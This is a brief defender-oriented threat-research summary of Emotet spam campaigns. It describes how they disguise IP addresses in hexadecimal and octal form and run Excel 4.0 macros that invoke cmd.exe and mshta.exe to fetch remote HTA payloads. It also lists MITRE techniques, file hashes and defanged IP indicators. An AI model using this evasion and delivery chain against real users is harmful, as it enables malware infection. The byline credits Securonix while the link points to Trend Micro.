Threat Research

Emotet Spam Abuses Unconventional IP Address Formats to Spread Malware

Securonix

Emotet spam campaigns are abusing hexadecimal and octal IP address formats to evade pattern-matching detection, delivering malware via Excel 4.0 Macros and HTA code. The operation leads to second-stage payloads like TrickBot and Cobalt Strike beacons, with guidance for defenders to detect and block these techniques. #Emotet #CobaltStrike

Keypoints

  • Emotet spam campaigns use hexadecimal and octal representations of IP addresses to evade detection.
  • Emails attach documents using Excel 4.0 Macros, abusing a dated feature to deliver malware and trigger auto_open execution.
  • The URL is obfuscated and the host contains a hexadecimal representation of an IP address.
  • Macro activity invokes cmd.exe > mshta.exe to download and execute HTA code from a remote host.
  • Successful execution results in second-stage beacons such as TrickBot and Cobalt Strike.
  • Security teams can use the unusual IP representations and command-line patterns as detection opportunities and to treat these IPs as suspicious.

MITRE Techniques

  • [T1566.001] Phishing – Spearphishing Attachment – “The samples we found start with an email-attached document using Excel 4.0 Macros…”
  • [T1204.002] User Execution: Malicious File – “The samples we found start with an email-attached document using Excel 4.0 Macros… Abuse of the feature in this case allows the malware to execute once the document is opened using the auto_open macro.”
  • [T1027] Obfuscated/Compressed Files and Information – “The URL is obfuscated with carets and the host contains a hexadecimal representation of the IP address.”
  • [T1105] Ingress Tool Transfer – “which will download and execute an HTML application (HTA) code from the remote host.”
  • [T1218.005] Mshta – “As observed, the macro also invokes cmd.exe > mshta.exe with the URL as an argument to download and execute an HTA code from the remote host.”
  • [T1059.003] Windows Command Shell – “cmd.exe > mshta.exe” used to launch the HTA payload from a remote host.

Indicators of Compromise

  • [SHA256] – Hexadecimal IP address sample; Octal IP address sample – e492f31ca20d99888b2434dcb4d9af1f93ed4c485b9bd2bc550ce8ae8021b9cd, 3e9701129f13f13f7b873f55dc3d43d04cbd1dd3f85814270bb1b177394926b5
  • [URLs] – 193[.]42[.]36[.]245, 46[.]105[.]81[.]76

Read more: https://www.trendmicro.com/en_us/research/22/a/emotet-spam-abuses-unconventional-ip-address-formats-spread-malware.html